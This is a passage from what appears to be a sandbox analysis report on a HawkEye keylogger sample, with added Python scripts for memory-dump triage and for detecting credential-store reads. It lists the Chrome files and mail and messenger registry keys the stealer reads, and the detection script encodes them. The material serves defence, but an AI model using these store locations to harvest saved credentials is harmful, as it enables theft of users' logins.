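        rec = parse_source(line)
        if rec and rec.get("form") == "sdmp" and rec["protect"] & 0xFF == PAGE_EXECUTE_READWRITE:
            hits.append((rec["proc"], rec["base"]))
    return sorted(hits)


if __name__ == "__main__":
    for proc, entry in sorted(summarize(SAMPLE_LINES).items()):
        rwx = ", ".join(f"0x{b:X}" for b in entry["rwx"]) or "-"
        print(f"process {proc}: {entry['dumps']} dumps, RWX at {rwx}, unpacked PEs: {len(entry['unpacked'])}")
```

                    Run stand-alone it prints one line per process index. The RWX hits it surfaces from the sample (0x402000 in process 1, 0x4D2000 in process 16) are what a triager pulls first: executable, writable memory inside the image range of a process the report already ties to HawkEye is where the unpacked payload is most likely to live, and the matching .unpack entries for the same process index are the PE images to load into a disassembler. Mapping a process index to the PIDs in the "Process Memory Space" entries needs the report's process tree, which this section does not contain.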
                    Yara detected MailPassView
                    Source: Yara match, File source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000024.00000002.888584585.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: vbc.exe PID: 5684, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 36.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 36.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Tries to harvest and steal browser information (history, passwords, etc.)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                    Tries to steal Mail credentials (via file access)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: ESMTPPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: ESMTPPassword
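                    The credential-theft rows above share one tell: the process doing the reading is the VB.NET compiler, vbc.exe, hollowed out to host the stealer, and it sweeps three unrelated store families (Chrome's Login Data / Web Data, the Google Talk and IdentityCRL keys, and the Outlook, Windows Messaging, IncrediMail and Windows Live Mail keys) in one run. The detection logic below is an added example, not part of the sandbox report: it takes file-open and registry-open events of the kind an EDR or Sysmon feed produces, attributes each to a store family, and flags any process that reads a store it does not own. The store paths and keys are the ones the report lists; the "legitimate owner" process names and the sample events are assumptions constructed for the example.

```python
"""Flag credential-store reads by processes that have no business making them.

Added example, not part of the sandbox report. The store paths and registry
keys are the ones the report shows vbc.exe opening; the "legitimate owner"
lists and the sample events are assumptions constructed here.
"""
import ntpath
from collections import defaultdict

# Chrome files that hold saved logins / autofill. Owner set is an assumption.
BROWSER_FILES = {
    "login data": {"chrome.exe"},
    "web data": {"chrome.exe"},
}

# (family, registry key suffix, lower-cased) -> processes expected to read it.
# Owner sets are assumptions and need tuning per estate.
REGISTRY_STORES = {
    ("im", r"software\google\google talk\accounts"): {"googletalk.exe"},
    ("im", r"software\microsoft\identitycrl\dynamic salt"): {"wlmail.exe"},
    ("mail", r"software\microsoft\office\outlook\omi account manager\accounts"): {"outlook.exe"},
    ("mail", r"software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles"): {"outlook.exe"},
    ("mail", r"software\incredimail\identities"): {"incredimail.exe"},
    ("mail", r"software\microsoft\windows live mail"): {"wlmail.exe"},
}


def classify(event):
    """Map an event to (family, store, owners) if it touches a credential store, else None."""
    target = event["target"].lower()
    if event["op"] == "FileOpen":
        base = ntpath.basename(target)
        if base in BROWSER_FILES and "\\google\\chrome\\user data\\" in target:
            return ("browser", base, BROWSER_FILES[base])
    elif event["op"] == "RegOpenKey":
        for (family, suffix), owners in REGISTRY_STORES.items():
            if target.endswith(suffix):
                return (family, suffix, owners)
    return None


def analyze(events):
    """Return {process_path: {"families": set, "stores": set}} for every process
    that read a credential store it does not own."""
    findings = defaultdict(lambda: {"families": set(), "stores": set()})
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        family, store, owners = hit
        if ntpath.basename(ev["process"]).lower() in owners:
            continue  # the application reading its own store
        findings[ev["process"]]["families"].add(family)
        findings[ev["process"]]["stores"].add(store)
    return dict(findings)


def severity(finding):
    """One foreign process sweeping several store families is the
    password-recovery-tool pattern (browser + mail + IM); a single family is
    worth a look but is also what a backup or migration tool does."""
    return "high" if len(finding["families"]) >= 2 else "medium"


VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
CHROME_DIR = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
HKCU = "HKEY_CURRENT_USER"

# Constructed events: the vbc.exe rows mirror the report, the rest are benign noise.
SAMPLE_EVENTS = [
    {"process": VBC, "op": "FileOpen", "target": CHROME_DIR + r"\Login Data"},
    {"process": VBC, "op": "FileOpen", "target": CHROME_DIR + r"\Web Data"},
    {"process": VBC, "op": "RegOpenKey", "target": HKCU + r"\Software\Google\Google Talk\Accounts"},
    {"process": VBC, "op": "RegOpenKey", "target": HKCU + r"\Software\Microsoft\IdentityCRL\Dynamic Salt"},
    {"process": VBC, "op": "RegOpenKey",
     "target": HKCU + r"\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"process": VBC, "op": "RegOpenKey", "target": HKCU + r"\Software\IncrediMail\Identities"},
    {"process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "op": "FileOpen", "target": CHROME_DIR + r"\Login Data"},
    {"process": r"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE", "op": "RegOpenKey",
     "target": HKCU + r"\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"},
    {"process": r"C:\Windows\explorer.exe", "op": "FileOpen", "target": CHROME_DIR + r"\Web Data"},
]

if __name__ == "__main__":
    for proc, finding in analyze(SAMPLE_EVENTS).items():
        print(severity(finding), proc, sorted(finding["families"]), sorted(finding["stores"]))
```

                    Run stand-alone, the script reports vbc.exe as "high" (three families) and explorer.exe as "medium" (one file), while chrome.exe and OUTLOOK.EXE reading their own stores produce nothing. The owner allowlist is the knob to tune; the aggregation across families is what separates a stealer from a backup agent and should not be relaxed.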
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara match; File source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000025.00000002.894159498.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.929210977.0000000003A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.863445427.0000000003961000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: vbc.exe PID: 6700, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: vbc.exe PID: 4184, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara match; File source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 37.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 37.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 20.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 20.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    Detected HawkEye Rat
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp; String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp; String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp; String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp; String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe; String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                    Source: INQUIRY.exe; String found in binary or memory: HawkEyeKeylogger
